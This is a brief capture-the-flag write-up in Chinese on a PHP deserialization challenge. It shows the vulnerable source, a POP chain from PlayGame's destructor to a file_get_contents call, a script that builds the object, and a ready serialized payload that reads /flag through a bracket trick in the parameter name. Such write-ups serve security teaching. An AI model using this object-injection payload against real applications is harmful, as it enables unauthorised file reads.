PlayGame(php反序列化，[绕过)

题目：

 <?php
/*
PolarD&N CTF
*/
class User{
    public $name;
    public $age;
    public $sex;

    public function __toString()
    {
        return "name:".$this->name."age:".$this->age."sex:".$this->sex;
    }
    public function setName($name){
        $this->name=$name;
    }
    public function setAge($age){
        $this->$age=$age;
    }
    public function setSex($sex){
        $this->$sex=$sex;
    }
}
class PlayGame{
    public $user;
    public $gameFile="./game";
    public function openGame(){
        return file_get_contents($this->gameFile);
    }
    public function __destruct()
    {
        echo $this->user->name."GameOver!";
    }
    public function __toString(){
        return $this->user->name."PlayGame ". $this->user->age . $this->openGame();
    }
}
if(isset($_GET['polar_flag.flag'])){
    unserialize($_GET['polar_flag.flag']);
}else{
    highlight_file(__FILE__);
} 

思路：

入口类PlayGame的__distruct方法，将$this->user=User类，触发User的__toString，再把User$this->name=PlayGame,触发PlayGame的__toString方法读取文件，get需要使用[绕过_的过滤

script:

$a = new User();
$b = new PlayGame();
$c = new PlayGame();
$b->user = $a;
$a->name = $c;
$c->gameFile="/flag";
echo serialize($b);

?polar[flag.flag=O:8:"PlayGame":2:{s:4:"user";O:4:"User":3:{s:4:"name";O:8:"PlayGame":2:{s:4:"user";N;s:8:"gameFile";s:5:"/flag";}s:3:"age";N;s:3:"sex";N;}s:8:"gameFile";s:6:"./game";}